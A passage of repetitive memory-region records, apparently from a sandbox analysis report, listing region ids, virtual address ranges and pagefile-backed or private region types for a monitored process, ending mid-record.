Region: id = 21969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21978 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21979 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21983 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21984 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21985 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21986 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21990 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22010 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22011 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22027 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 22028 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22030 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22045 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22046 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22049 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22050 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22052 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22053 start_va = 0x3ec0000 end_va = 0x3edbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 22054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22089 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 22090 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22091 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22092 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22157 start_va = 0x610000 end_va = 0x61efff monitored 